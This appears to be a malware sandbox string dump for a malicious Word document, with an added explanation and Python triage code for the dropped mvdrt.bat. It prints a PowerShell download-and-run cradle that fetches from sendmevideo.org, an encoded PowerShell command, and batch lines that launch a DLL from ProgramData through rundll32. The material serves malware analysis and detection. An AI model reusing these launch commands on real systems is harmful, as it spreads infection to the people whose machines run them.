Ansi based on PCAP Processing (network.pcap)
KodchiangUPC
Unicode based on Runtime Data (WINWORD.EXE )
Kokila
Unicode based on Runtime Data (WINWORD.EXE )
Kristen ITC
Unicode based on Runtime Data (WINWORD.EXE )
Kunstler Script
Unicode based on Runtime Data (WINWORD.EXE )
KvGDun
Ansi based on Dropped File (~WRD0000.tmp)
l_____:,_---_---_
Ansi based on Image Processing (screen_3.png)
la_r.
Ansi based on Image Processing (screen_3.png)
LanguageList
Unicode based on Runtime Data (rundll32.exe )
Lao UI
Unicode based on Runtime Data (WINWORD.EXE )
LastPurgeTime
Unicode based on Runtime Data (WINWORD.EXE )
Latha
Unicode based on Runtime Data (WINWORD.EXE )
lc-lZQrRT6g./
Ansi based on PCAP Processing (network.pcap)
Leelawadee
Unicode based on Runtime Data (WINWORD.EXE )
LegalCopyright
Unicode based on Dropped File (carved_0.dll.1509628513544)
Levenim MT
Unicode based on Runtime Data (WINWORD.EXE )
lGawh'QwS
Ansi based on PCAP Processing (network.pcap)
LilyUPC
Unicode based on Runtime Data (WINWORD.EXE )
LoadLibraryA
Ansi based on PCAP Processing (network.pcap)
LoadLibraryW
Ansi based on PCAP Processing (network.pcap)
lstrcmpiA
Ansi based on PCAP Processing (network.pcap)
lstrlenA
Ansi based on Dropped File (carved_0.dll.1509628513544)
lstrlenW
Ansi based on Dropped File (carved_0.dll.1509628513544)
Lucida Bright
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Calligraphy
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Console
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Fax
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Handwriting
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Sans
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Sans Typewriter
Unicode based on Runtime Data (WINWORD.EXE )
Lucida Sans Unicode
Unicode based on Runtime Data (WINWORD.EXE )
LUl\$^U@UO^"9Ac |K`z'r{Wi/}.'26&g\U&|qJvVPK!uwvdocProps/app.xml (RN0#QPPKj
Ansi based on Dropped File (~WRD0000.tmp)
LvVxJO<?d^YZXaTtC@^1M *#Y0^:XtX+Ix!8q{z]!cZPS"*V<m0&-<nj*4=evc,nk
Ansi based on Dropped File (~WRD0000.tmp)
M]D/Qs2a0
Ansi based on PCAP Processing (network.pcap)
Magneto
Unicode based on Runtime Data (WINWORD.EXE )
Mai_ing_
Ansi based on Image Processing (screen_6.png)
Maiandra GD
Unicode based on Runtime Data (WINWORD.EXE )
Malgun Gothic
Unicode based on Runtime Data (WINWORD.EXE )
Mangal
Unicode based on Runtime Data (WINWORD.EXE )
MapViewOfFile
Ansi based on PCAP Processing (network.pcap)
Marlett
Unicode based on Runtime Data (WINWORD.EXE )
Matura MT Script Capitals
Unicode based on Runtime Data (WINWORD.EXE )
MaV7lULoIT};>
Ansi based on PCAP Processing (network.pcap)
Max Display
Unicode based on Runtime Data (WINWORD.EXE )
mB,oQOx<9SZ|c
Ansi based on PCAP Processing (network.pcap)
Meiryo
Unicode based on Runtime Data (WINWORD.EXE )
Meiryo UI
Unicode based on Runtime Data (WINWORD.EXE )
MH_Ward
Ansi based on Image Processing (screen_3.png)
micr0c0ftw0rd
Ansi based on Image Processing (screen_6.png)
Microsoft Himalaya
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft JhengHei
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft New Tai Lue
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft PhagsPa
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft Sans Serif
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft Tai Le
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft Uighur
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft YaHei
Unicode based on Runtime Data (WINWORD.EXE )
Microsoft Yi Baiti
Unicode based on Runtime Data (WINWORD.EXE )
MingLiU
Unicode based on Runtime Data (WINWORD.EXE )
MingLiU-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
MingLiU_HKSCS
Unicode based on Runtime Data (WINWORD.EXE )
MingLiU_HKSCS-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
Miriam
Unicode based on Runtime Data (WINWORD.EXE )
Miriam Fixed
Unicode based on Runtime Data (WINWORD.EXE )
Mistral
Unicode based on Runtime Data (WINWORD.EXE )
Modern No. 20
Unicode based on Runtime Data (WINWORD.EXE )
Mongolian Baiti
Unicode based on Runtime Data (WINWORD.EXE )
Monotype Corsiva
Unicode based on Runtime Data (WINWORD.EXE )
MoolBoran
Unicode based on Runtime Data (WINWORD.EXE )
Mountain View1
Ansi based on PCAP Processing (network.pcap)
MS Gothic
Unicode based on Runtime Data (WINWORD.EXE )
MS Mincho
Unicode based on Runtime Data (WINWORD.EXE )
MS Outlook
Unicode based on Runtime Data (WINWORD.EXE )
MS PGothic
Unicode based on Runtime Data (WINWORD.EXE )
MS PMincho
Unicode based on Runtime Data (WINWORD.EXE )
MS Reference Sans Serif
Unicode based on Runtime Data (WINWORD.EXE )
MS Reference Specialty
Unicode based on Runtime Data (WINWORD.EXE )
MS UI Gothic
Unicode based on Runtime Data (WINWORD.EXE )
MSOBALLOON
Unicode based on Runtime Data (WINWORD.EXE )
MsoHelp10
Unicode based on Runtime Data (WINWORD.EXE )
mspim_wnd32
Unicode based on Runtime Data (WINWORD.EXE )
MT Extra
Unicode based on Runtime Data (WINWORD.EXE )
mu7hVBpsW
Ansi based on PCAP Processing (network.pcap)
MultiByteToWideChar
Ansi based on PCAP Processing (network.pcap)
MV Boli
Unicode based on Runtime Data (WINWORD.EXE )
mv1uPFnOn
Ansi based on PCAP Processing (network.pcap)
Narkisim
Unicode based on Runtime Data (WINWORD.EXE )
nector
Unicode based on Dropped File (carved_0.dll.1509628513544)
Network
Unicode based on Runtime Data (rundll32.exe )
NextUpdate
Unicode based on Runtime Data (WINWORD.EXE )
Niagara Engraved
Unicode based on Runtime Data (WINWORD.EXE )
Niagara Solid
Unicode based on Runtime Data (WINWORD.EXE )
nNorma_nNosaci
Ansi based on Image Processing (screen_6.png)
NSimSun
Unicode based on Runtime Data (WINWORD.EXE )
Nyala
Unicode based on Runtime Data (WINWORD.EXE )
O,CtU$Wq:h2]$}|z%jo4>6]>b>M8M2_f}u=fJ7lkO
Ansi based on Dropped File (~WRD0000.tmp)
o__0_
Ansi based on Image Processing (screen_3.png)
OCR A Extended
Unicode based on Runtime Data (WINWORD.EXE )
oductVersion
Unicode based on Dropped File (carved_0.dll.1509628513544)
Old English Text MT
Unicode based on Runtime Data (WINWORD.EXE )
ompany
Unicode based on Dropped File (carved_0.dll.1509628513544)
OpenFileMappingA
Ansi based on PCAP Processing (network.pcap)
PageLayaut
Ansi based on Image Processing (screen_3.png)
PagiLayaut
Ansi based on Image Processing (screen_6.png)
Palace Script MT
Unicode based on Runtime Data (WINWORD.EXE )
Palatino Linotype
Unicode based on Runtime Data (WINWORD.EXE )
Papyrus
Unicode based on Runtime Data (WINWORD.EXE )
Paragraph
Ansi based on Image Processing (screen_6.png)
Parchment
Unicode based on Runtime Data (WINWORD.EXE )
Patte
Ansi based on Image Processing (screen_3.png)
Perpetua
Unicode based on Runtime Data (WINWORD.EXE )
Perpetua Titling MT
Unicode based on Runtime Data (WINWORD.EXE )
Pi]M&zZ|c
Ansi based on PCAP Processing (network.pcap)
PK!$[Content_Types].xml (MO@&Wz0M.C~dgJKZ23J<*kROz,#m,eEDi
Ansi based on Dropped File (~WRD0000.tmp)
PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!=lgt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0
Ansi based on Dropped File (~WRD0002.tmp)
PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!_DMt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0
Ansi based on Dropped File (~WRD0000.tmp)
Plantagenet Cherokee
Unicode based on Runtime Data (WINWORD.EXE )
Playbill
Unicode based on Runtime Data (WINWORD.EXE )
PMingLiU
Unicode based on Runtime Data (WINWORD.EXE )
PMingLiU-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
Poor Richard
Unicode based on Runtime Data (WINWORD.EXE )
Pristina
Unicode based on Runtime Data (WINWORD.EXE )
Process32First
Ansi based on PCAP Processing (network.pcap)
Process32Next
Ansi based on PCAP Processing (network.pcap)
ProductFiles
Unicode based on Runtime Data (WINWORD.EXE )
ProductName
Unicode based on Dropped File (carved_0.dll.1509628513544)
ProductNonBootFilesIntl_1033
Unicode based on Runtime Data (WINWORD.EXE )
ProxyBypass
Unicode based on Runtime Data (WINWORD.EXE )
ProxyEnable
Unicode based on Runtime Data (rundll32.exe )
ProxyOverride
Unicode based on Runtime Data (rundll32.exe )
ProxyServer
Unicode based on Runtime Data (rundll32.exe )
PSSSSSSVS
Ansi based on PCAP Processing (network.pcap)
q4V[x%
Ansi based on Dropped File (carved_0.dll.1509628513544)
qD8AiIQg4
Ansi based on PCAP Processing (network.pcap)
QueryPerformanceCounter
Ansi based on PCAP Processing (network.pcap)
R`parD"[2nCeun`X?x-^XiF'*1L-]3NiK^"C!FNs=g@\o^^h^^h;l/izfNpA{;$8cg]|s);O:SpJMTcaZEobb*y2"_CZ4JNLz4eQizIaL* 42@-^\MCG-&+[WFWmf$PjMZ-sunX-U=FUMt]7 '#8M#p'[VW8?8PU 6jWfT=v&Pj7NxX
Ansi based on Dropped File (~WRD0000.tmp)
Raavi
Unicode based on Runtime Data (WINWORD.EXE )
Rage Italic
Unicode based on Runtime Data (WINWORD.EXE )
RASMAN
Unicode based on Runtime Data (powershell.exe )
rasman
Ansi based on Runtime Data (powershell.exe )
Ravie
Unicode based on Runtime Data (WINWORD.EXE )
ReadFile
Ansi based on Dropped File (carved_0.dll.1509628513544)
Reference_
Ansi based on Image Processing (screen_3.png)
RegCloseKey
Ansi based on PCAP Processing (network.pcap)
RegCreateKeyExA
Ansi based on PCAP Processing (network.pcap)
RegOpenKeyExA
Ansi based on PCAP Processing (network.pcap)
RegQueryValueExA
Ansi based on PCAP Processing (network.pcap)
RegSetValueExA
Ansi based on PCAP Processing (network.pcap)
Review
Ansi based on Image Processing (screen_3.png)
rFJKR|epcY`
Ansi based on PCAP Processing (network.pcap)
Rifirinci_
Ansi based on Image Processing (screen_6.png)
Rivim
Ansi based on Image Processing (screen_6.png)
Rockwell
Unicode based on Runtime Data (WINWORD.EXE )
Rockwell Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Rockwell Extra Bold
Unicode based on Runtime Data (WINWORD.EXE )
RY3d>"!~D
Ansi based on PCAP Processing (network.pcap)
s "%s", %s
Unicode based on Dropped File (carved_0.dll.1509628513544)
S/$0O:QbgH(AZ[n)B(#1TJ4~%&.U]_oQh;;l]-e!2Y)?yh\e?e,OUxB*sP}br>aM|XKdPK!To^=word/stylesWithEffects.xmlmS8}CHp4P3m60Z|~ pV;wc]Wa<$2Z'}=,GNg}%tx>,=TcO^O2'-NhW,zb[d#`e,=$dceb%\yCj8T(G$(pk!2M$<dnDPkt+0(u=Aa`AwIW0EF9ljaH}Id[wb1MhmeI\jh)@c.7,zH&lG*}RKYd&YFYl,+_/T
Ansi based on Dropped File (~WRD0000.tmp)
s] <"w
Ansi based on Dropped File (~WRD0000.tmp)
s__g,.
Ansi based on Image Processing (screen_6.png)
Sakkal Majalla
Unicode based on Runtime Data (WINWORD.EXE )
satellitedeluxpanorama
Ansi based on PCAP Processing (network.pcap)
satellitedeluxpanorama.com
Ansi based on PCAP Processing (network.pcap)
satellitedeluxpanorama.com0
Ansi based on PCAP Processing (network.pcap)
SavedLegacySettings
Unicode based on Runtime Data (rundll32.exe )
Script MT Bold
Unicode based on Runtime Data (WINWORD.EXE )
secnt.dll
Ansi based on PCAP Processing (network.pcap)
SECU_
Ansi based on Image Processing (screen_0.png)
Security1
Ansi based on PCAP Processing (network.pcap)
Segoe Print
Unicode based on Runtime Data (WINWORD.EXE )
Segoe Script
Unicode based on Runtime Data (WINWORD.EXE )
Segoe UI
Unicode based on Runtime Data (WINWORD.EXE )
Segoe UI Light
Unicode based on Runtime Data (WINWORD.EXE )
Segoe UI Semibold
Unicode based on Runtime Data (WINWORD.EXE )
Segoe UI Symbol
Unicode based on Runtime Data (WINWORD.EXE )
sendmevideo
Ansi based on PCAP Processing (network.pcap)
sendmevideo.org
Ansi based on PCAP Processing (PCAP)
ServicesActive
Unicode based on Runtime Data (rundll32.exe )
set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"
Ansi based on Dropped File (mvdrt.bat)
set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"if NOT exist %inst_pck % (exit)start rundll32.exe %inst_pck %,#1
Ansi based on Dropped File (mvdrt.bat)
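The mvdrt.bat strings above (two fragments and one run-together copy of the whole file) are the dropper's launch logic. Two details matter when reading them: cmd.exe takes everything between "set" and "=" as the variable name, so "set inst_pck = ..." defines a variable whose name ends in a space, which is why every later reference is written "%inst_pck %" with the same trailing space; and the "if NOT exist ... (exit)" guard makes the script exit silently when the DLL was not dropped, so a logon on a machine where only the .bat survived leaves no rundll32 process to catch. The Python below is an added example, not part of the sandbox report: it replays those cmd.exe semantics to resolve the final rundll32 command line and records why it is suspicious (DLL loaded by ordinal, from a user-writable directory). The value of %ALLUSERSPROFILE% (C:\ProgramData) is an assumption; the sandbox output does not record it.

```python
import re

# Constructed copy of the three mvdrt.bat lines recovered in the dump above.
MVDRT_BAT = (
    'set inst_pck = "%ALLUSERSPROFILE%\\mvdrt.dll"\n'
    'if NOT exist %inst_pck % (exit)\n'
    'start rundll32.exe %inst_pck %,#1\n'
)

# Assumed value; the sandbox output does not record the real environment.
ASSUMED_ENV = {"ALLUSERSPROFILE": "C:\\ProgramData"}

_SET_RE = re.compile(r"^\s*set\s+(?P<name>[^=]+)=(?P<value>.*)$", re.IGNORECASE)
_VAR_RE = re.compile(r"%([^%]+)%")
# rundll32 <dll>,<export>; the export is either a name or an ordinal written as #N
_RUNDLL_RE = re.compile(
    r'rundll32(?:\.exe)?\s+(?P<dll>"[^"]+"|[^,\s"]+),(?P<export>#\d+|\w+)', re.IGNORECASE)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def expand(text, env):
    """Expand %NAME% references as cmd.exe does: case-insensitive exact match on
    everything between the percent signs, whitespace included.  Unknown names
    are left as written, which is what a .bat file does too."""
    lower = {k.lower(): v for k, v in env.items()}
    return _VAR_RE.sub(lambda m: lower.get(m.group(1).lower(), m.group(0)), text)


def resolve_batch(script, env):
    """Return the non-'set' commands with variables expanded.  cmd.exe keeps the
    whole text between 'set' and '=' as the name, so 'set inst_pck = ...'
    defines 'inst_pck ' (trailing space) and the value keeps its leading space;
    the later '%inst_pck %' references resolve only because they repeat that
    trailing space."""
    env = dict(env)
    commands = []
    for raw in script.splitlines():
        line = expand(raw, env)        # expansion happens before the command runs
        m = _SET_RE.match(line)
        if m:
            env[m.group("name")] = m.group("value")
            continue
        commands.append(line.strip())
    return commands


def rundll32_target(cmd):
    """(dll_path, export) for a rundll32 command line, else None."""
    m = _RUNDLL_RE.search(cmd)
    if not m:
        return None
    return m.group("dll").strip('"'), m.group("export")


def triage(script, env):
    """Resolve the script and explain why its rundll32 launch is suspicious."""
    findings = []
    target = None
    for cmd in resolve_batch(script, env):
        t = rundll32_target(cmd)
        if t is None:
            continue
        target = t
        dll, export = t
        if export.startswith("#"):
            findings.append(f"{dll} is loaded by ordinal {export}: no export name "
                            "to pivot on, hunt by file hash and path instead")
        if not dll.lower().startswith(TRUSTED_DIRS):
            findings.append(f"{dll} lives in a user-writable directory")
    return {"target": target, "findings": findings}
```

Resolving the script yields rundll32.exe "C:\ProgramData\mvdrt.dll",#1 under the assumed environment. A hunting query that looks for rundll32 with "%inst_pck%" or for the literal DLL name in the .bat would miss this: the DLL path only exists after expansion, and the export is an ordinal, so the usual named-export indicators do not apply.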
SetLastError
Ansi based on PCAP Processing (network.pcap)
SHELL32.dll
Ansi based on PCAP Processing (network.pcap)
SHGetSpecialFolderPathW
Ansi based on PCAP Processing (network.pcap)
Shonar Bangla
Unicode based on Runtime Data (WINWORD.EXE )
Showcard Gothic
Unicode based on Runtime Data (WINWORD.EXE )
Shruti
Unicode based on Runtime Data (WINWORD.EXE )
si_ict
Ansi based on Image Processing (screen_6.png)
Silict_
Ansi based on Image Processing (screen_3.png)
SimHei
Unicode based on Runtime Data (WINWORD.EXE )
Simplified Arabic
Unicode based on Runtime Data (WINWORD.EXE )
Simplified Arabic Fixed
Unicode based on Runtime Data (WINWORD.EXE )
SimSun
Unicode based on Runtime Data (WINWORD.EXE )
SimSun-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
Site 1
Unicode based on Runtime Data (WINWORD.EXE )
Site 10
Unicode based on Runtime Data (WINWORD.EXE )
Site 11
Unicode based on Runtime Data (WINWORD.EXE )
Site 12
Unicode based on Runtime Data (WINWORD.EXE )
Site 13
Unicode based on Runtime Data (WINWORD.EXE )
Site 14
Unicode based on Runtime Data (WINWORD.EXE )
Site 15
Unicode based on Runtime Data (WINWORD.EXE )
Site 16
Unicode based on Runtime Data (WINWORD.EXE )
Site 17
Unicode based on Runtime Data (WINWORD.EXE )
Site 18
Unicode based on Runtime Data (WINWORD.EXE )
Site 19
Unicode based on Runtime Data (WINWORD.EXE )
Site 2
Unicode based on Runtime Data (WINWORD.EXE )
Site 20
Unicode based on Runtime Data (WINWORD.EXE )
Site 3
Unicode based on Runtime Data (WINWORD.EXE )
Site 4
Unicode based on Runtime Data (WINWORD.EXE )
Site 5
Unicode based on Runtime Data (WINWORD.EXE )
Site 6
Unicode based on Runtime Data (WINWORD.EXE )
Site 7
Unicode based on Runtime Data (WINWORD.EXE )
Site 8
Unicode based on Runtime Data (WINWORD.EXE )
Site 9
Unicode based on Runtime Data (WINWORD.EXE )
Sleep
Ansi based on Dropped File (carved_0.dll.1509628513544)
Snap ITC
Unicode based on Runtime Data (WINWORD.EXE )
SNle_
Ansi based on Image Processing (screen_6.png)
source.android.google.cn
Ansi based on PCAP Processing (network.pcap)
SpellingAndGrammarFiles_1033
Unicode based on Runtime Data (WINWORD.EXE )
SpellingAndGrammarFiles_1036
Unicode based on Runtime Data (WINWORD.EXE )
SpellingAndGrammarFiles_3082
Unicode based on Runtime Data (WINWORD.EXE )
StaleIETldCache
Unicode based on Runtime Data (rundll32.exe )
start rundll32.exe %inst_pck %,#1
Ansi based on Dropped File (mvdrt.bat)
Stencil
Unicode based on Runtime Data (WINWORD.EXE )
StringFileInfo
Unicode based on Dropped File (carved_0.dll.1509628513544)
Sylfaen
Unicode based on Runtime Data (WINWORD.EXE )
Symbol
Unicode based on Runtime Data (WINWORD.EXE )
System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;
Ansi based on Process Commandline (00040140-00002460)
t?f98t:j%YjsZj\f
Ansi based on PCAP Processing (network.pcap)
t___t____
Ansi based on Image Processing (screen_6.png)
Tahoma
Unicode based on Runtime Data (WINWORD.EXE )
TC(9Mj
Ansi based on Dropped File (~WRD0000.tmp)
Tempus Sans ITC
Unicode based on Runtime Data (WINWORD.EXE )
TLDUpdates
Unicode based on Runtime Data (rundll32.exe )
Traditional Arabic
Unicode based on Runtime Data (WINWORD.EXE )
TranslateMessage
Ansi based on PCAP Processing (network.pcap)
Trebuchet MS
Unicode based on Runtime Data (WINWORD.EXE )
Tunga
Unicode based on Runtime Data (WINWORD.EXE )
Tw Cen MT
Unicode based on Runtime Data (WINWORD.EXE )
Tw Cen MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Tw Cen MT Condensed Extra Bold
Unicode based on Runtime Data (WINWORD.EXE )
t{-E;X6?vX&+$Hy'r}}W6]1oXWV:DzHp*\;\)4{wt%n0,vFO9cxY:Y7,N%gwY PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I
Ansi based on Dropped File (~WRD0000.tmp)
UNCAsIntranet
Unicode based on Runtime Data (WINWORD.EXE )
UnmapViewOfFile
Ansi based on PCAP Processing (network.pcap)
urchin.c(
Ansi based on PCAP Processing (network.pcap)
USER32.dll
Ansi based on PCAP Processing (network.pcap)
Utsaah
Unicode based on Runtime Data (WINWORD.EXE )
uz/l$
Ansi based on Dropped File (~WRD0000.tmp)
v`g/~{_Mc4(i%a)S.Lp)D^i)XKf\m
Ansi based on Dropped File (~WRD0000.tmp)
VarFileInfo
Unicode based on Dropped File (carved_0.dll.1509628513544)
Verdana
Unicode based on Runtime Data (WINWORD.EXE )
VerifyVersionInfoW
Ansi based on PCAP Processing (network.pcap)
VerSetConditionMask
Ansi based on PCAP Processing (network.pcap)
Vijaya
Unicode based on Runtime Data (WINWORD.EXE )
Viner Hand ITC
Unicode based on Runtime Data (WINWORD.EXE )
VirtualAlloc
Ansi based on PCAP Processing (network.pcap)
VirtualFree
Ansi based on PCAP Processing (network.pcap)
Vivaldi
Unicode based on Runtime Data (WINWORD.EXE )
Vladimir Script
Unicode based on Runtime Data (WINWORD.EXE )
vmzQC-J6%s - %lu
Ansi based on PCAP Processing (network.pcap)
Vrinda
Unicode based on Runtime Data (WINWORD.EXE )
VS_VERSION_INFO
Unicode based on Dropped File (carved_0.dll.1509628513544)
w".4kj,g6_WyF!#G2>
Ansi based on Dropped File (~WRD0000.tmp)
w0rdc;
Ansi based on Image Processing (screen_6.png)
W=8}L$mNz7"T-ur_(/IuvX?z~6po+Ua/
Ansi based on Dropped File (~WRD0000.tmp)
WaitForSingleObject
Ansi based on PCAP Processing (network.pcap)
Webdings
Unicode based on Runtime Data (WINWORD.EXE )
Wide Latin
Unicode based on Runtime Data (WINWORD.EXE )
WideCharToMultiByte
Ansi based on PCAP Processing (network.pcap)
Wingdings
Unicode based on Runtime Data (WINWORD.EXE )
Wingdings 2
Unicode based on Runtime Data (WINWORD.EXE )
Wingdings 3
Unicode based on Runtime Data (WINWORD.EXE )
WININET.dll
Ansi based on PCAP Processing (network.pcap)
WORDFiles
Unicode based on Runtime Data (WINWORD.EXE )
WpadDecision
Unicode based on Runtime Data (rundll32.exe )
WpadDecisionReason
Unicode based on Runtime Data (rundll32.exe )
WpadDecisionTime
Unicode based on Runtime Data (rundll32.exe )
WpadLastNetwork
Unicode based on Runtime Data (rundll32.exe )
WpadNetworkName
Unicode based on Runtime Data (rundll32.exe )
WriteFile
Ansi based on PCAP Processing (network.pcap)
WS2_32.dll
Ansi based on PCAP Processing (network.pcap)
wsprintfA
Ansi based on PCAP Processing (network.pcap)
wsprintfW
Ansi based on PCAP Processing (network.pcap)
www.goo.gl
Ansi based on PCAP Processing (network.pcap)
XjiYjl_jaf
Ansi based on PCAP Processing (network.pcap)
xOm~_O
Ansi based on Dropped File (carved_0.dll.1509628513544)
xvGdxeGex>Gdx
Ansi based on PCAP Processing (network.pcap)
y6rC(Wuh5
Ansi based on PCAP Processing (network.pcap)
Y8\bOVRU0
Ansi based on PCAP Processing (network.pcap)
youtube.com
Ansi based on PCAP Processing (network.pcap)
youtubeeducation.com
Ansi based on PCAP Processing (network.pcap)
y}_{8r i{
Ansi based on PCAP Processing (network.pcap)
Z,P6vO[f6C=\f{Ya)7$vj?G(a
Ansi based on Dropped File (~WRD0000.tmp)
zk7^U}p'6XpgE3/,\hv.KDY
Ansi based on Dropped File (~WRD0000.tmp)
zMU=ZNz@*Qba@r"M:y+0Ow2}oIc,XP@&DBAIJqD(
Ansi based on Dropped File (~WRD0000.tmp)
zO-}@t
Ansi based on Dropped File (carved_0.dll.1509628513544)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data (rundll32.exe )
|O-}@~
Ansi based on Dropped File (carved_0.dll.1509628513544)
|p&h@JrRe
Ansi based on PCAP Processing (network.pcap)
|sJXOI|x"Ef.2%>>2S^Xb)?w.E"drtz]"=Z^Xcf8bm$$<R6g./
Ansi based on Dropped File (~WRD0000.tmp)
~%0uJNGr:E/6|,doJkF`
Ansi based on Dropped File (~WRD0000.tmp)
~C(g{.hHq
Ansi based on PCAP Processing (network.pcap)
~xM`ijU <8PU 6o#\vMST';@5:k&017qq.bkx@lypx@lmla(y{%]
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU 6o\vMSTs;@5oex@KA##8M
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU |
Ansi based on Dropped File (~WRD0000.tmp)
$5caa`= &!Cd,E.y6CnHgs0_?V_Nw ,{5Iq{Bl(p_cdS|&PO\UbHcK)KjVkUSD2P
Ansi based on Dropped File (~WRD0000.tmp)
$http://g.symcb.com/crls/gtglobal.crl0!
Ansi based on PCAP Processing (network.pcap)
%?nu gPK!/]N word/theme/theme1.xmlY;4.[?%y
Ansi based on Dropped File (~WRD0000.tmp)
%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll
Unicode based on Runtime Data (WINWORD.EXE )
)http://crl.geotrust.com/crls/secureca.crl0N
Ansi based on PCAP Processing (network.pcap)
*.android.com
Ansi based on PCAP Processing (network.pcap)
*.appengine.google.com
Ansi based on PCAP Processing (network.pcap)
*.cloud.google.com
Ansi based on PCAP Processing (network.pcap)
*.db833953.google.cn
Ansi based on PCAP Processing (network.pcap)
*.gcp.gvt2.com
Ansi based on PCAP Processing (network.pcap)
*.google-analytics.com
Ansi based on PCAP Processing (network.pcap)
*.google.ca
Ansi based on PCAP Processing (network.pcap)
*.google.cl
Ansi based on PCAP Processing (network.pcap)
*.google.co.in
Ansi based on PCAP Processing (network.pcap)
*.google.co.jp
Ansi based on PCAP Processing (network.pcap)
*.google.co.uk
Ansi based on PCAP Processing (network.pcap)
*.google.com
Ansi based on PCAP Processing (network.pcap)
*.google.com.ar
Ansi based on PCAP Processing (network.pcap)
*.google.com.au
Ansi based on PCAP Processing (network.pcap)
*.google.com.br
Ansi based on PCAP Processing (network.pcap)
*.google.com.co
Ansi based on PCAP Processing (network.pcap)
*.google.com.mx
Ansi based on PCAP Processing (network.pcap)
*.google.com.tr
Ansi based on PCAP Processing (network.pcap)
*.google.com.vn
Ansi based on PCAP Processing (network.pcap)
*.google.com0Y0
Ansi based on PCAP Processing (network.pcap)
*.google.de
Ansi based on PCAP Processing (network.pcap)
*.google.es
Ansi based on PCAP Processing (network.pcap)
*.google.fr
Ansi based on PCAP Processing (network.pcap)
*.google.hu
Ansi based on PCAP Processing (network.pcap)
*.google.it
Ansi based on PCAP Processing (network.pcap)
*.google.nl
Ansi based on PCAP Processing (network.pcap)
*.google.pl
Ansi based on PCAP Processing (network.pcap)
*.google.pt
Ansi based on PCAP Processing (network.pcap)
*.googleadapis.com
Ansi based on PCAP Processing (network.pcap)
*.googleapis.cn
Ansi based on PCAP Processing (network.pcap)
*.googlecommerce.com
Ansi based on PCAP Processing (network.pcap)
*.googlevideo.com
Ansi based on PCAP Processing (network.pcap)
*.gstatic.cn
Ansi based on PCAP Processing (network.pcap)
*.gstatic.com
Ansi based on PCAP Processing (network.pcap)
*.gvt1.com
Ansi based on PCAP Processing (network.pcap)
*.gvt2.com
Ansi based on PCAP Processing (network.pcap)
*.metric.gstatic.com
Ansi based on PCAP Processing (network.pcap)
*.urchin.com
Ansi based on PCAP Processing (network.pcap)
*.url.google.com
Ansi based on PCAP Processing (network.pcap)
*.youtube-nocookie.com
Ansi based on PCAP Processing (network.pcap)
*.youtube.com
Ansi based on PCAP Processing (network.pcap)
*.youtubeeducation.com
Ansi based on PCAP Processing (network.pcap)
*.ytimg.com
Ansi based on PCAP Processing (network.pcap)
-'--'-
Ansi based on Image Processing (screen_3.png)
-enc …
Ansi based on Process Commandline (powershell.exe)
-https://www.geotrust.com/resources/repository0
Ansi based on PCAP Processing (network.pcap)
.MfIZUq"=loO.Y$m.+gAT!,MQH(XI\qZbaG;_K
Ansi based on Dropped File (~WRD0000.tmp)
.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!=lgtdocProps/core.xml (RN0}7YH$o@e0{V{6}WeTTz=%y|G"5LW0-<
Ansi based on Dropped File (~WRD0002.tmp)
.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!_DMtdocProps/core.xml (RN0}7Y`$jxD^uM[w+fL|sO;"uS@J*<'\K^T0,
Ansi based on Dropped File (~WRD0000.tmp)
/n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx"
Ansi based on Process Commandline (WINWORD.EXE)
/x#,/d}?eh7)mg;kk4Df2/wBmw4A^#FkPHxAt~9'ozWnMtVWkJlNWz^>\PK!yUword/document.xmlVKo8/@=X'udshj)rPXF$mwuqa>fIp_lJT *_o.+T0
Ansi based on Dropped File (~WRD0000.tmp)
